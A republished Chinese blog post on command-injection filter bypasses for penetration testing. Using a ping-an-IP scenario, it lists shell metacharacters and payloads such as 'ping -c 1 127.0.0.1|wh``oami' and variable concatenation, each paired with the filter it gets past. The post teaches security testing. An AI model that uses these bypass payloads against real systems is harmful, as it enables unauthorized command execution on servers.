2. 程式人生 > >命令執行常用命令

命令執行常用命令

阿新 發佈:2018-05-28
命令執行常用命令

在滲透測試過程中,會遇見一些關於命令執行的漏洞,下面是收集的一些常用命令:

;   <   >   <>  |   ||  &  &&   `` ()   ‘ ‘

假設一種場景,從前端接收ip比如:127.0.0.1,後端對該ip進行ping測試: ping 127.0.0.1

  1. 沒有任何防護
    技術分享圖片

  2. 過濾了|
    技術分享圖片

  3. 過濾了 ; |
    技術分享圖片

  4. 過濾了 ; | &
    技術分享圖片

  5. 過濾了 whoami關鍵字
    ping -c 1 127.0.0.1|wh``oami
    技術分享圖片

  6. 過濾了whoami ``
    ping -c 1 127.0.0.1|wh‘‘oami
    技術分享圖片

  7. 過濾了whoami `` ‘‘

    ping -c 1 127.0.0.1;a=who;b=ami;$a$b
    技術分享圖片

  8. 過濾了whoami `` ‘‘ $
    ping -c 1 127.0.0.1|whoam""i
    技術分享圖片

  9. 過濾了whoami `` ‘‘ $ "" ;
    ping -c 1 127.0.0.1|whoam\i
    技術分享圖片

命令執行常用命令

相關推薦

命令執行常用命令

命令執行常用命令在滲透測試過程中,會遇見一些關於命令執行的漏洞,下面是收集的一些常用命令: ; < > <> | || & && `` () ‘ ‘ 假設一種場景,從前端接收ip比如:127.0.0.1,後端對該ip進行ping測

linux下執行常用命令出現:command not found

在 linux 下執行類似與 ls、ll、vim 等命令時出現 command not found,並且執行 source /etc/profile 出現 bash: id: command n

robot用例執行常用命令

ase 避免 puts 想要 ngs com data ndt 切換 執行命令 執行一個用例 robot -t “testcase_name“ data_test.robot 按用例文件執行 robot data_test.rob

Laravel 命令常用命令

tar class nan nbsp lis 更新 ocs 令行 target 一、簡介 1、Artisan 是 Laravel 自帶的命令行接口名稱,它為我們在開發過程中提供了很多有用的命令。想要查看所有可用的Artisan命令,可使用list命令: php ar

BAT簡單入門-命令視窗常用命令

命令視窗常用命令 1、cd 命令 cd       //顯示當前目錄 cd ..       //退出到上一個目錄 cd /d D:      //進入上次D盤所在目錄 cd /d d:\&nbs

把git倉庫從碼雲遷到github,及git常用命令 git常用命令--持續更新

  前言 剛開始建倉庫的時候,因為網路的原因選擇了國內的碼雲。後來又想換成github,畢竟平時github使用率比較高。   替換遠端倉庫地址方式如下: git remote set-url origin 你新的遠端倉庫地址   另附上git常用命令

Oracle_使用bat命令執行sql命令檔案

1.建立一個空資料夾:AA 2.在AA中建立一個文字檔案,輸入內容,然後儲存為start.bat sqlplus username/[email protected] @sql.sql>

HDFS命令列客戶端使用,命令列客戶端支援的命令引數,常用命令引數介紹

[[email protected] learn]$ hadoop fs help Usage: hadoop fs [generic options]        [-appendToFile <localsrc> ... <dst>]        [-c

資料庫【redis】基本命令 redis常用命令大全

redis常用命令大全   1.基於記憶體的key-value資料庫 2.基於c語言編寫的,可以支援多種語言的api //set每秒11萬次,取get 81000次 3.支援資料持久化 4.value可以是

Kafka命令常用命令說明

bin/kafka-create-topic.sh   --replica 1 --partition 1 --topic test2 --zookeeper 192.168.197.170:2181,192.168.197.171:2181 結果 topic: test2 partition: 0 le

Linux命令常用命令符號解釋

一、萬用字元:" * ” 、" ? ”   和dos下一樣,當我們不知道確切的檔名時,可以用萬用字元來進行模糊操作。“*”可以代表任意長度的任意字元,“?”代表一個任意字元。 二、轉義字元:" \ ”   和dos的命名規則不同的是,萬用字元" * ”、" ? ”是可以在檔名中使用的。   如果要操作的檔

shell命令-grep常用命令

grep常用命令 grep命令 文字搜尋命令,它能使用正則表示式搜尋文字,並把匹配的行打印出來 新建檔案ifconfig.txt enp0s3 Link encap:乙太網 硬體地址 08:00:27:4f:ed:45

Linux 常用命令 / vim常用命令 / 面試常考命令 彙總 (更新中)

這篇部落格會記錄常用的Linux命令,可以直接使用Ctrl+F來快速查詢命令~ 程序類 top 概述 top命令是Linux下常用的效能分析工具,能夠實時顯示系統中各個程序的資源佔用狀況,類似於Windows的工作管理員。 可以直接使用top

Linux常用命令 Xshell常用命令摘記

(1) 命令ls——列出檔案 ls  顯示當前目錄檔案 ls -la 給出當前目錄下所有檔案的一個長列表,包括以句點開頭的“隱藏”檔案 ls a* 列出當前目錄下以字母a開頭的所有檔案 ls -l *.doc 給出當前目錄下以.doc結尾的所有檔案 (2)命令cp——複製檔

Linux下ping命令常用命令選項

一、ping命令簡介ping (Packet Internet Groper),因特網包探索器,用於測試網路連線量的程式。Ping傳送一個ICMP;回聲請求訊息給目的地並報告是否收到所希望的ICMP echo (ICMP回聲應答)。它是用來檢查網路是否通暢或者網路連線速度的命

PHP執行系統命令的有幾個常用的函數

exe 自動 文件操作 nal 外部命令 中間 ring 打開 lcm PHP執行系統命令的有幾個常用的函數,如有:system函數、exec函數、popen函數,passthru,shell_exec函數他們都可以執行系統命令,不過前提時必須系統給了權限了哦。 syste

docker compose安裝與常用命令介紹 及使用docker-compose執行一個進銷存管理系統

使用微服務架構的應用系統一般包含若干個微服務,每個微服務一般都會部署多個例項。如果每個微服務都要手動啟停,那麼效率之低,維護量之大可想而知 docker compose 是一個用於定義和執行多容器docker應用程式的工具   安裝: 下在並安裝適應系統版本的compose

Redis第一課:安裝,執行常用命令

本文只作為參考學習: 1:下載redis地址: https://github.com/MSOpenTech/redis/releases 解壓檔案就可以看到以下檔案目錄: 開啟一個 cmd 視窗 使用 cd 命令切換目錄到 C:\redis 執行: redis-server.exe

JVM除錯常用命令——jstack命令與Java執行緒棧(1)

1 jstack 命令 jstack命令的主要作用是列印指定Java程序中每一個執行緒的工作狀態,以及每個執行緒棧當前的方法執行順序等詳細情況。為什麼jstack命令不和jmap、jinfo、jstat等命令一同講解,而要單獨成文呢?因為通過jstack命令給出的執行緒棧詳細情況,可

JVM除錯常用命令——jstack命令與Java執行緒棧(2)

(接上文《JVM除錯常用命令——jstack命令與Java執行緒棧(1)》) 1.2、jstack中的執行緒關鍵資訊 上一篇文章中我們介紹了jstack命令的基本使用,也列舉了一個比較簡單的示例。雖然之前的文章內容中沒有介紹查詢結果中的一些關鍵資訊,但是這並不影響什麼。本片文章中